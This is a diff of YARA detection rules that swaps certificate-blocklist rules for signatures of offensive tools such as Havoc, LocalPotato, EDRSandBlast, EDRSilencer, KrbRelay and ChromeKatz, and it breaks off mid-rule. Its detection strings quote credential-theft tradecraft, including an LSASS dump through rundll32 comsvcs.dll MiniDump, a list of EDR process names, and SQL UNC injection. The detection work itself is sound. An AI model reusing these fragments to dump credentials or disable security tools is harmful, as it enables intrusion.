+		$s4 = "ListMembers" fullword ascii
+		$s5 = "GroupMembers" fullword ascii
+		$s6 = "get_SamAccountName" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aefcdac" and pe.signatures [ i ] . serial == "51:72:ca:a2:11:91:85:38:23:43:fc:be:09:c4:3b:ee" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009245D1511923F541844Faa3C6Bfebcbe : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Pandora : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Pandora tool to extract credentials from password managers"
 		author = "ditekSHen"
-		id = "db876459-a0d2-542f-8f7e-a486ba68aeb4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3f71f24b-755f-5967-afbf-04a512bd0a19"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3776-L3787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1677-L1691"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8d2c186b3aaaf353857e67ffd51a785e674335e824be78fc1c2ae1b9a0532eae"
+		logic_hash = "dd5be3b99b62ec40c242225d9420b9ce299c4f348882b0380289309dfedbc1e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "509cbd2cd38ae03461745c7d37f6bbe44c6782cf"
-		importance = 20
+
+	strings:
+		$s1 = "process PID:" fullword wide
+		$s2 = "Dump file created:" fullword wide
+		$s3 = "System.Security.AccessControl.FileSystemAccessRule('Everyone', 'FullControl', 'Allow')" ascii
+		$s4 = "{[math]::Round($_.PrivateMemorySize64" ascii
+		$s5 = "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $" ascii
+		$s6 = "\"payload\":{\"logins\":" ascii
+		$s7 = "\\pandora.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEHTEH d.o.o.," and pe.signatures [ i ] . serial == "00:92:45:d1:51:19:23:f5:41:84:4f:aa:3c:6b:fe:bc:be" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E161F76Da3B5E4623892C8E6Fda1Ea3D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Havoc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Havoc Demon"
 		author = "ditekSHen"
-		id = "a010cf24-b29a-5613-8122-92ced507564f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "71ad145c-4017-597a-837e-5d11ba64d7c0"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3789-L3800"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1693-L1710"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aae91e2873633989b3716930354361ee56d7fd7af35e105ae15ed6bf87de67a"
+		logic_hash = "c5806deaa57590ebe1923608b9b085460e0edd024721e6e9d7073765a79bf22b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "df5fbfbfd47875b580b150603de240ead9c7ad27"
-		importance = 20
+
+	strings:
+		$x1 = "X-Havoc:" wide
+		$x2 = "X-Havoc-Agent:" wide
+		$s1 = "\\Werfault.exe" wide
+		$s2 = "/funny_cat.gif" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TGN Nedelica d.o.o." and pe.signatures [ i ] . serial == "00:e1:61:f7:6d:a3:b5:e4:62:38:92:c8:e6:fd:a1:ea:3d" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 3 of them or ( pe.number_of_imports == 0 and pe.number_of_exports == 0 and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_009Faf8705A3Eaef9340800Cc4Fd38597C : FILE
+rule DITEKSHEN_INDICATOR_TOOLS_Localpotato : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "5b85e806-6b13-5356-a225-23399b947114"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects LocalPotato"
+		author = "ditekShen"
+		id = "65f8305b-b830-58e7-970b-da1df9a06e9b"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3802-L3813"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1712-L1743"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41c6561ef50950c7a5b4107b788e0469f77b9905b777edb24501649e4c313bd6"
+		logic_hash = "88fba16a6eec6d2c23331642041c6adfddddeb21ba8e74b6959bd48c90f73cbb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "40c572cc19e7ca4c2fb89c96357eff4c7489958e"
-		importance = 20
+
+	strings:
+		$x1 = "LocalPotato.stg" fullword wide
+		$x2 = "we always love potatoes" fullword ascii
+		$s1 = "{00000306-0000-0000-c000-000000000046}" wide
+		$s2 = "{854A20FB-2D44-457D-992F-EF13785D2B51}" wide
+		$s3 = "cifs/127.0.0.1" wide
+		$s4 = "\\\\127.0.0.1\\c$" wide
+		$s5 = "complete failed: 0x%08x" ascii
+		$s6 = "Authorization: NTLM %s" ascii
+		$s7 = "Objref Moniker Display Name = %S" ascii
+		$s8 = "SMB Connect Tree: %S" ascii
+		$s9 = "b64type=%s" fullword ascii
+		$s10 = "decodes=%s" fullword ascii
+		$s11 = { 53 4d 42 72 00 00 00 00 18 01 48 00 00 00 00 00
+               00 00 00 00 00 00 00 ff ff ac 7b 00 00 00 00 00
+               22 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 02 53
+               4d 42 20 32 2e 30 30 32 00 02 53 4d 42 20 32 2e
+               3f 3f 3f 00 00 00 00 00 00 00 00 00 00 00 68 fe
+               53 4d 42 40 }
+		$o1 = { 44 8b 4c 24 34 48 8d 44 24 38 48 89 44 24 28 4c }
+		$o2 = { e8 c4 ff ff ff 33 d2 48 8d 4d f0 41 b8 d0 04 00 }
+		$o3 = { 83 7b 0c 00 75 42 8b 03 25 ff ff ff 1f 3d 21 05 }
+		$o4 = { 3c 68 74 6c 3c 6a 74 5c 3c 6c 74 34 3c 74 74 24 }
+		$o5 = { e9 39 ff ff ff cc 48 89 5c 24 08 4c 89 4c 24 20 }
+		$o6 = { 48 b9 ff ff ff ff ff ff 0f 00 48 8b c2 41 b8 0c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tekhnokod LLC" and pe.signatures [ i ] . serial == "00:9f:af:87:05:a3:ea:ef:93:40:80:0c:c4:fd:38:59:7c" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or 8 of ( $s* ) or ( 4 of ( $o* ) and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2888Cf0F953A4A3640Ee4Cfc6304D9D4 : FILE
+rule DITEKSHEN_INDICATOR_TOOLS_Edrsandblast : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "4c3153e4-d3ce-5e87-8e72-969cba972e26"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects EDRSandBlast"
+		author = "ditekShen"
+		id = "85d6d82b-a30e-5c79-93e7-8a3bbbf4a403"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3815-L3826"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1745-L1767"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e0d1b74422ae1004b0054c161d1dc949bb368ac17575e33c9b6d550bb136126"
+		logic_hash = "9b801f053e42fbd646cf62fecf6cbf5f2cceeec82bed93ecd8625984eccb08c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "eb5f5ab7294ba39f2b77085f47382bd7e759ff3a"
-		importance = 20
+
+	strings:
+		$s1 = "credguard" fullword wide
+		$s2 = "\\cmd.exe" fullword wide
+		$s3 = "ci_%s.dll" fullword wide
+		$s4 = "cmd /c sc" wide
+		$s5 = "fltmgr_%s.sys" fullword wide
+		$s6 = "ntoskrnl_%s.exe" fullword wide
+		$s7 = "ProductDir" fullword wide
+		$s8 = "lsass.exe" fullword wide
+		$s9 = "0x%p;%ws;%ws;;;" ascii
+		$s10 = "MiniDumpWriteDump" ascii
+		$s11 = "EDRSB_Init: %u" ascii
+		$s12 = "ntoskrnloffsets.csv" fullword wide nocase
+		$s13 = "wdigestoffsets.csv" fullword wide nocase
+		$o1 = { eb 0e 8b 85 34 15 00 00 ff c0 89 85 34 15 00 00 }
+		$o2 = { 74 48 8b 85 34 15 00 00 41 b9 04 01 00 00 4c 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lotte Schmidt" and pe.signatures [ i ] . serial == "28:88:cf:0f:95:3a:4a:36:40:ee:4c:fc:63:04:d9:d4" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C8Edcfe8Be174C2F204D858C5B91Dea5 : FILE
+rule DITEKSHEN_INDICATOR_TOOLS_Rsockstun : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "196da268-b9a3-562c-ad68-67d17ea94ccf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects rsockstun"
+		author = "ditekShen"
+		id = "a284a607-abea-5914-ad3a-84eaff733ee0"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3828-L3839"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1769-L1781"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "56801a71547218413ab48381c412a8e1b7fd41a9f7a7c85dc6debdc38a19d6c4"
+		logic_hash = "4ad0ac389bf8961b0dd987a72d5dd534e5e3cc673f0e07aa49d39d1fd3f5f53e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7f5f205094940793d1028960e0f0e8b654f9956e"
-		importance = 20
+
+	strings:
+		$s1 = "main.connectviaproxy" ascii
+		$s2 = "main.connectForSocks" ascii
+		$s3 = "main.listenForClients" ascii
+		$s4 = "main.listenForSocks" ascii
+		$s5 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Paarcopy Oy" and pe.signatures [ i ] . serial == "00:c8:ed:cf:e8:be:17:4c:2f:20:4d:85:8c:5b:91:de:a5" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1A311630876F694Fe1B75D972A953Bca : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Scmaldevinj_Go : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "2a39397f-1585-5f7f-a2a9-aab62d29a2b2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Go shell/malware dev injector"
+		author = "ditekShen"
+		id = "56ec114f-8e16-5ab6-ae3b-a182cb381b4a"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3841-L3852"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1783-L1793"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f14532caf49e6f46f75e42e334d3170db0ebebfe75c9f3e057c237691b5d86a2"
+		logic_hash = "48c3c759283c63a0c439cfba0194da89f402189e4c3cd831c22b5078ccae47b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d473ec0fe212b7847f1a4ee06eff64e2a3b4001e"
-		importance = 20
+
+	strings:
+		$s1 = "hooka/shellcode.go" ascii
+		$s2 = "/maldev\x09v" ascii
+		$s3 = "Binject/debug/pe." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GTEC s.r.o." and pe.signatures [ i ] . serial == "1a:31:16:30:87:6f:69:4f:e1:b7:5d:97:2a:95:3b:ca" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A496Bc774575C31Abec861B68C36Dcb6 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Reversessh_Go : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "2415bf62-15d4-562a-a448-682474d89af0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects golang reverse ssh tool"
+		author = "ditekShen"
+		id = "4fb671aa-ad42-5f7e-bd5a-c19f018088c9"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3854-L3865"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1795-L1804"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf5282687f4707bc16d388361ddc0af1102df0d29066ece0b57215fcf9fdcc94"
+		logic_hash = "4f9899aacc09c7da05fb5d412cfe8e91ee0d8e922189a6f921410d73ae8b3a9c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b2c70d30c0b34bfeffb8a9cb343e5cad5f6bcbf7"
-		importance = 20
+
+	strings:
+		$s1 = "/reverse_ssh/" ascii
+		$s2 = "main.rsshService" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ea720222D92Dc8D48E3B3C3B0Fc360A6 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpghosttask : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpGhostTask"
 		author = "ditekSHen"
-		id = "2e43e98a-61f8-5f93-a415-52cb6453620d"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "84d71179-0cfd-5389-b6bd-92c292361b3c"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3867-L3878"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1806-L1817"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "97b2699d4cb0fd88e3440ea82dd6ea87cdac69c6ba2acd884f5aef577b55e79d"
+		logic_hash = "3de8d9fe7804e208ff556b6bedbd80eebfda1a730626403418a555ad9fbbb820"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "522d0f1ca87ef784994dfd63cb0919722dfdb79f"
-		importance = 20
+
+	strings:
+		$x1 = "Ghosted" wide
+		$x2 = /--target(binary|task)/ fullword wide
+		$x3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\T" wide nocase
+		$s4 = "__GhostTask|" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_333Ca7D100B139B0D9C1A97Cb458E226 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Krbrelay : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "dd5b3eb8-81c0-570d-9ec8-6a55eb7864f9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects KrbRelay"
+		author = "ditekshen"
+		id = "c8baac8a-54f3-5f53-93f8-daabeaaaff44"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3880-L3891"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1819-L1836"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4519127b975d93297cca9b465ad88b3d38ad0fce0de182246dca3f000e2438be"
+		logic_hash = "f76b585cd2d741eab9d91ffd5a34c38696ac573cba1a3752d21c4b8b6681ad7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d618cf7ef3a674ff1ea50800b4d965de0ff463cb"
-		importance = 20
+
+	strings:
+		$s1 = "System.Collections.Generic.IEnumerable<System.IntPtr>.GetEnumerator" fullword ascii
+		$s2 = "System.Collections.Generic.IEnumerator<System.IntPtr>.get_Current" fullword ascii
+		$s3 = "GetProcessIdFromIPid" fullword ascii
+		$g1 = "hello.stg" fullword wide
+		$g2 = "DSInternals.Common" fullword ascii
+		$g3 = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_7b3eed059f4c3e41\\Amd64\\UNIDRV.DLL" fullword wide
+		$g4 = "C:\\Windows\\System32\\kernelbase.dll" fullword wide
+		$g5 = "get_UnsupportedSecretEncryptionType" fullword ascii
+		$g6 = "CoInitializeSecurity Error: 0x{0:X8}. Exploit will fail." fullword wide
+		$g7 = "AuthnSvc: {0} - PrincName: {1}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 4 of ( $g* ) ) or ( 7 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_58Ec8821Aa2A3755E1075F73321756F4 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Edrsilencer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "efa0e5c6-773a-5740-b7f9-ec10a92b1623"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects EDRSilencer"
+		author = "ditekshen"
+		id = "29b6da1e-9138-5ee6-b9fd-d7b3c7f48626"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3893-L3904"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1838-L1857"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b79f161c77cbae0bec55fb2b047983660c84d2bb93db8c91cb6c22fd4ad197cc"
+		logic_hash = "da00aced2608fd5e192397ef2346ac247f29f993995fb90189e05da60be15d13"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "19dd0d7f2edf32ea285577e00dd13c966844cfa4"
-		importance = 20
+
+	strings:
+		$s1 = "block \"C:\\Windows\\System32\\curl.exe\"" ascii
+		$s2 = "blockedr" fullword ascii
+		$s3 = "edrProcess" fullword ascii
+		$s4 = "BlockEdrProcessTraffic" fullword ascii
+		$s5 = "isInEdrProcessList" fullword ascii
+		$s6 = "EDRSilencer.c" fullword ascii
+		$v1 = "elastic-agent.exe" fullword ascii nocase
+		$v2 = "CybereasonAV.exe" fullword ascii nocase
+		$v3 = "SentinelAgent.exe" fullword ascii nocase
+		$v4 = "fortiedr.exe" fullword ascii nocase
+		$v5 = "MsMpEng.exe" fullword ascii nocase
+		$v6 = "CylanceSvc.exe" fullword ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbebbfeaddcbcccffdcdc" and pe.signatures [ i ] . serial == "58:ec:88:21:aa:2a:37:55:e1:07:5f:73:32:17:56:f4" )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $v* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0940Fa9A4080F35052B2077333769C2F : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Edrprison : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "2cc722de-97ff-53d1-9436-dc88c844186b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects EDRPrison"
+		author = "ditekshen"
+		id = "85831265-fd9e-5e0e-b5d9-22bf1c89b3f2"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3906-L3917"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1859-L1872"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ecf6982c779a5fd867fef4b753313e379151491fa8865e8ae20f0c9362431a2"
+		logic_hash = "e1ef9e9c6bd0d2efa7b0b617fb52100075658221559f92a61c672807ab5a4d77"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "da154c058cd75ff478b248701799ea8c683dd7a5"
-		importance = 20
+
+	strings:
+		$s1 = "Block:" wide
+		$s2 = "PacketLen:" wide
+		$s3 = "DoWorkPacket_Step" ascii
+		$s4 = "DoWorkAsyncNETWORK" ascii
+		$s5 = "BlockMessage" ascii
+		$s6 = "GetRmAddrPortNetwork" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56Fff139Df5Ae7E788E5D72196Dd563A : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpsqlpwn : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "7cdca79f-5bf3-5768-b034-4d3bb177ffc9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects SharpSQLPwn"
+		author = "ditekshen"
+		id = "f99c0ddb-a073-5c15-9a7c-60f6766cd0a2"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3919-L3930"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1874-L1891"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "022fd24ba023dba06f1c63d1d1c90d17dc82b060d634a27b237d37e37455964f"
+		logic_hash = "c811d4926c433c6521f4bbe03a1abf4a5b27b56931a18a8bb672f37fe4fccfb8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0f69ccb73a6b98f548d00f0b740b6e42907efaad"
-		importance = 20
+
+	strings:
+		$s1 = "smb_ip" fullword ascii
+		$s2 = "Recon" fullword ascii
+		$s3 = "UNCPathInjection" fullword ascii
+		$s4 = "from sys.server_principals" wide
+		$s5 = "EXEC sp_configure '" wide
+		$s6 = "EXEC ('sp_configure" wide
+		$s7 = "CREATE ASSEMBLY" wide
+		$s8 = "DROP ASSEMBLY" wide
+		$s9 = "FROM 0x" wide
+		$s10 = "EXEC master..xp_dirtree \"\\\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_03D433Fdc2469E9Fd878C80Bc0545147 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Chromekatz : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "4f793397-2768-5b34-a9f5-9100dccfa80e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects ChromeKatz: CookieKatz and CredentialKatz"
+		author = "ditekshen"
+		id = "9dd706c8-552c-5c96-9b81-cfd50157ac34"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3932-L3943"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1893-L1908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fde125138ade8ab1a61544b90160f2c1d4bba3a09ffcf828768f98d925ab91c6"
+		logic_hash = "4f1bdbb7f8c4893444baac287c8fcefaca80a4301845706b56e9f9628c9f116f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "64e90267e6359060a8669aebb94911e92bd0c5f3"
-		importance = 20
+
+	strings:
+		$s1 = "\\include\\xmemory" ascii wide
+		$s2 = "targetBrowser" ascii
+		$s3 = "thirdPattern" ascii
+		$s4 = "isBrowserWow64" ascii
+		$s5 = "wcscpy_s(memory, size_in_elements, string)" fullword wide
+		$s6 = "hChrome" fullword ascii
+		$t1 = "szCookieMonster" fullword ascii
+		$t2 = "szPasswordReuseDetectorInstances" fullword ascii
 
